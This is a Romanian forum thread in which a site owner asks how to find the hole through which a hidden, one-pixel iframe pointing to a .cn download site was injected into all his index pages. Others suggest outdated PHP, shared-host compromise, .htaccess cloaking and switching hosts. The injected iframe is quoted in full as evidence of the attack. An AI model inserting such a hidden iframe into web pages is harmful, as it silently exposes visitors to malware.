Se poate afla daca un site are sau nu vulnerabilitati?

[thefan]

Salut

Am tot cautat pe Google, dar n-am gasit nici o solutie, deci m-am decis sa intreb aici:

Se poate testa / audita cumva o pagina web dpdv a securitatii? Ma refer la descoperirea portitelor prin care se poate introduce cod malitios in sursa paginii?

Caz concret: e vorba de un site facut in css+html, care mai foloseste un phponline 2.1.2 (php+mysql).

La un moment dat in toate fisierele denumite index a aparut un iframe cu continut strain:

Cod:

<iframe src="(Link: http:// litedownloadseek.cn/in.cgi?cocacola16)http:// litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe>

N-am gasit portita inca... si site-ul apare ca "Reported attack site" de 2 saptamani (a fost curatata sursa, a fost trimisa adresa la Google pentru reconsideration dar inca fara rezultat).

[haos]

Cat oferi?

[thefan]

un forum de profitori

Sfaturi, ceva? Pe gratis eventual

[evolution]

Nu prea le am cu php , dar m-am apucat sa invat. Am citit chiar azi ceva despre vulnerabilitati aici .

De ce nu muti siteul pe un server cu ultima versiune de php ? Daca nu ai descoperit cauza atacului ,se poate repeta ...

[haos]

Nu e profitori bre da nu-ti da nimeni pe gratis ce a acumulat in 15 ani. Da ca sfat vechi de cand internetul: e normal sa patesti asa cand folosesti scripturi luate de pe net, in special daca nu sunt luate de la surse de incredere.
Incearca sa iei de pe SF daca tot iei de pe net.

[thefan]

Nu e profitori bre

No offence, glumeam

Am cautat pe gogu dupa vulnerabilitatile scriptului phpOnline, si nu s-a documentat nici o vulnerabilitate din cate am observat...

Apropos, acest lucru pe care l-am intalnit se numeste "cross site scripting" (XSS)?

[eugen]

Mai există şi varianta în care nu e vina scriptului, ci a administratorilor sau a altui client ( dacă e vorba de găzduire shared ).

Şi eu am păţit ceva asemănător doar că în cazul meu mi-au fost rescrise fişierele .htaccess. Dacă intrai pe sit cu un browser vedeai o pagină "în construcţie", iar dacă erai Google sau Yahoo erai redirecţionat ( 301 ) către altă locaţie.

[Nosfer]

am patit si eu faza cu iFrame odata si mi-au fost infectoate toate index.php, header.php si footer.php de la multe site-uri. Am schimbat hostingul cu unul mai bun si am instalat ultimele versiuni sigure de CMS-uri si problemele au disparut. Cred ca nu e vorba de vulnerabilitatea site-ului ci de vulnerabilitatea serverului pe care e hostat.

[evolution]

Cand cineva are nevoie de ajutor pt ca i-a fost spart siteul sau whatever, nu e etic sa ii ceri bani.Poti sa ii dai macar niste indicii.

Daca vroia sa isi faca un site cu jocuri poker sau felicitari cred ca era altceva.

In fine , fiecare are morala si etica sa, dar roata se invarte tot timpul , daca ati observat

[GExGE]

Lectura placuta: http://www.docstoc.com/docs/1195753/php-security

(oarecum offtopic)